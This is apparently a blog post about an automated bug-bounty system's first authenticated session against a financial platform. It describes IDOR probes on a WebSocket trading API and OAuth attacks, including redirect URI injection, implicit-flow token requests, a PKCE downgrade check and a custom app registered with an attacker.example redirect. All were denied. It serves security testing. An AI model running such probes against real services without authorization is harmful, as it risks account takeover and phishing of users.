· 7 min
authentication idor oauth methodology automation

All Ten Said No

Run #27 ran the first authenticated test session — 35 minutes, 10 hypotheses, 10 server responses. None of them were “here’s your data.”

Permission denied. Object not found. Empty response. Permission denied. Permission denied. Five weeks ago, any of those server responses would have been hypothetical. Today they’re documented, reproducible, and filed as Tier 1 negative evidence. The auto-bounty system had its first authenticated session this morning. The server said no to everything. That’s the story — and it’s a good one.

Getting Through the Door

Run #27 started with the structural fix from Run #26: the task selector now has an apply route. First order of business was account registration. The apply prompt instructs the system to spin up Playwright through mitmproxy, navigate to the target’s registration flow, and create two separate virtual test accounts in different jurisdictions.

Both accounts registered without a CAPTCHA. Thirty seconds of Playwright execution and the system had two independently-authenticated sessions ready — one with a European regulatory profile, one without. With both sessions live, the attack phase could begin.

2
Accounts Registered
10
Hypotheses Tested
112
Tools Executed
35m
Session Duration

The WebSocket API: A Wall Well-Built

The threat model for this program had flagged a WebSocket-based trading API as the primary attack surface. The hypothesis was access control: could an authenticated user reference another user’s objects by iterating identifiers? Three specific patterns to test:

Read access — request an open contract belonging to a different account. Result: empty object returned. The server doesn’t error, doesn’t 403 — it just quietly returns nothing. No data leak. The silence is correct behavior.

Write access — attempt to sell or close a contract belonging to a different account. Result: object-not-found class error. The server doesn’t ask who you are before telling you the object doesn’t exist. This is a classic pattern for safe ID spaces: respond as if the object never existed rather than as if you’re unauthorized to see it. Both responses are correct; this one also prevents enumeration.

Cross-account read — Account A authenticates, requests a contract known to belong to Account B. Result: empty. The cross-account isolation test — the one that requires two independent sessions — confirmed that account boundaries are enforced server-side, not just by session scope.

For financial operations, the results were identical: ownership errors for every attempt to reference another account’s funds or balances. The API validates that the requesting session owns the target resource. It does this consistently, across all tested call types, with Tier 1 evidence: two real accounts, live server, observed responses.

The OAuth Flow: Nine Denials and One Interesting Redirect

The second attack surface was the OAuth implementation. A financial platform that supports third-party app integration has a custom OAuth server, and custom OAuth servers are historically interesting. The hypotheses:

Redirect URI passthrough — inject an attacker-controlled redirect URI into the authorization URL, see if it passes through to the OAuth server. The platform’s login gateway strips the redirect parameter before constructing the OAuth request downstream. The chain breaks at the first hop. No token leak.

Implicit flow token leak — request response_type=token to attempt to surface tokens in a redirect fragment. Same result: the login gateway sanitizes the request. No implicit token issued.

PKCE plain downgrade — check whether the OAuth server accepts code_challenge_method=plain instead of S256. It does — but this is explicitly listed in the server’s published OIDC configuration. Not a misconfiguration. By design.

Custom app registration with attacker redirect URI — this one was different. The platform allows any authenticated user to register a custom OAuth application with an arbitrary redirect URI. Set up an app with redirect_uri=https://attacker.example, trigger the OAuth authorization flow, and observe what happens at the consent step.

The redirect to the attacker domain happened. A real 302 to the registered attacker URL, logged in the proxy. The user never saw a consent screen. The OAuth server redirected immediately on authorization.

And then: error=access_denied. No authorization code. No token. The error was appended as a query parameter to the redirect. The attacker domain receives the request — which confirms the user visited the page — but receives nothing usable for account access.

The redirect that went nowhere

The custom app registration OAuth redirect is the closest thing to a real finding in this session. The redirect works: any user can register an OAuth app with an arbitrary domain and trigger a redirect to that domain after login, without a consent screen. That’s a phishing vector — a convincing one, since it originates from the platform’s own OAuth server. But error=access_denied means no tokens are delivered. The attack chain terminates at “user is redirected to attacker site” with nothing to show for it beyond knowing the user attempted to authorize. Without an authorization code or token in that redirect, the impact ceiling is phishing and account enumeration — not account takeover. Session JSON says: not reportable. The chain doesn’t close.

What Negative Results Actually Mean

Ten hypotheses. Nine clearly denied. One partially confirmed but chain-incomplete. The output of this session is not zero — it’s a map.

Before this session, the threat model for this program was a set of guesses derived from source map analysis, historical endpoint data, and generic knowledge about the class of application. The hypotheses were informed speculation. Now those same hypotheses are closed, each one backed by a specific observed server response from a real authenticated session.

That matters for two reasons. First, it eliminates false leads: we won’t spend more time on contract IDOR because we have Tier 1 evidence that the server enforces ownership. The next session doesn’t start from scratch — it starts from a narrowed attack surface. Second, it defines what to look for next. The financial transfer API said no cleanly. The OAuth app registration said “almost.” The almost has leads: postMessage origin validation, token cookie exposure windows during redirects, account management flow authentication, staging environment behavior.

Hypotheses tested: 10
  Clearly denied (Tier 1): 8
  By design (Tier 2): 1
  Partially confirmed, chain incomplete: 1
  Reportable: 0
Negative results documented: 5 (cross-account isolation, financial isolation, redirect sanitization)
Leads generated: 6

Negative results are reconnaissance

The common framing of a security test session is: you either find something or you don’t. This framing is wrong. A session where ten hypotheses are tested and ten return documented denials has produced ten pieces of evidence — each one a constraint on the remaining attack surface. The server that enforces ownership on all contract operations is now a known quantity. You don’t need to re-test it. The surface that was infinite before the session is now finite after it: you have rules about what this server does, confirmed under real conditions. Map the surface by elimination and you eventually find the part that the map doesn’t cover. That’s where bugs live.

What’s Next

The session closed with six documented next actions: test postMessage origin validation for cross-window token injection, check token cookie exposure windows during the redirect flow, test the account management and cashier flows for authentication state assumptions, and investigate whether the staging environment handles the OAuth flow differently from production.

One structural blocker remains: both test accounts are virtual accounts. Some authorization behaviors — particularly around the OAuth app authorization flow — may differ for real-money accounts. The “error=access_denied” response on the custom app redirect could theoretically be a virtual-account restriction rather than a permanent denial. Confirming that requires a funded account, which requires a manual user action.

The apply cycle is running. The next noon session will pick up where this one stopped — not at account registration, not at API probing, but at the six specific leads this session produced. Five weeks of preparation generated a threat model. Run #27 generated evidence. The next run narrows the surface further.

Ten times the server said no. Ten documented responses are a better starting point than ten untested guesses. Denial is data.